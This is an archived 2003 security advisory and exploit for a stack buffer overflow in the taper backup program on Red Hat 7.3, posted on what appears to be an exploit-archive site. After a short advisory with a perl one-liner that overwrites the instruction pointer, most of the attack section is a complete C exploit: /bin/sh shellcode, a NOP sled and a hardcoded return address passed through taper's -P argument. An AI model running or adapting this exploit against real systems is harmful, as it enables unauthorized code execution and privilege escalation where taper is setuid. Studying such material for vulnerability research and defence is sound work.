taper.txt

taper.txt: Posted Oct 30, 2003; Authored by Polygrithm | Site geekz.nl; The taper program in Redhat 7.3 contains a stack overflow. Note that taper is not setuid.; tags | exploit, overflow; systems | linux, redhat; SHA-256 | 89a935c740c96748fa0a62389876ff938ee1fb09b87005b568f271a93db7ee97; Download | Favorite | View

taper.txt



  HI,
        There is a stack overflow vulnerability in taper program of linux 
7.3 (may be others)..
On linux 7.3 its not suid by default. But i dont know about other distro/ver 
. may be its
suid on others..

Advisory:

------------------------------------------------------------------------------------------------------------------------------
gEEkz-advisory
NrAziz(c) 2003
nraziz_at_geekz_nl
polygrithm_at_hotmail
http://geekz.nl

--{0x01 Introduction:

Taper is a user friendly archive  program  especially  designed
for backing up to tape drives. It also supports backing up to files
on a hard disk.

--{0x02 Vulnerability:

taper has a vulnerability in its argument to -P .By giving a large
string it overwrites the eip..
e.g taper `perl -e 'print "A" x 2708'` over writes the eip. It may have 
other possible vulnerabilites because
of the usage of many strcpy's. Taper by default is none-suid on Linux 
7.3,However if its suid
on any other distro/ver please let me know then..

--{0x03 Greetz:

To gEEkz team,rave,gorny,and other m8s

------------------------------------------------------------------------------------------------------------------------------

Exploit:

------------------------------------------------------------------------------------------------------------------------------
      /* gEEkz-taper-xploit */
/*
* Copyright(C) 2003 NrAziz
* nraziz^at^geekz^nl
*/
#include <stdio.h>
#include <stdlib.h>

/* /bin/sh */
char shellcode[]=
                 "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                 "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
                 "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                 "\x80\xb0\x01\x31\xdb\xcd\x80";
#define B_SIZE 2708
int main(int argc,char **argv)
{
  char buffer[B_SIZE];
  int i;
  u_long ret=0xbffff250;

  memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);
  buffer[B_SIZE-4]=(ret & 0x000000ff);
  buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;
  buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;
  buffer[B_SIZE-1]=(ret & 0xff000000)>>24;
  buffer[B_SIZE-0]=0;
  memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));

  execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);
  return 0;
}



---------------------------------------------------------------------------------------------------------------------------------------

REgards,
NrAziz

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*. 
http://join.msn.com/?page=features/featuredemail

Top Authors In Last 30 Days

Red Hat 222 files
Ubuntu 58 files
Debian 28 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 6 files
Milad Karimi 5 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,023)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,346)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,586)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,464)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

taper.txt

taper.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

taper.txt

Share This

taper.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems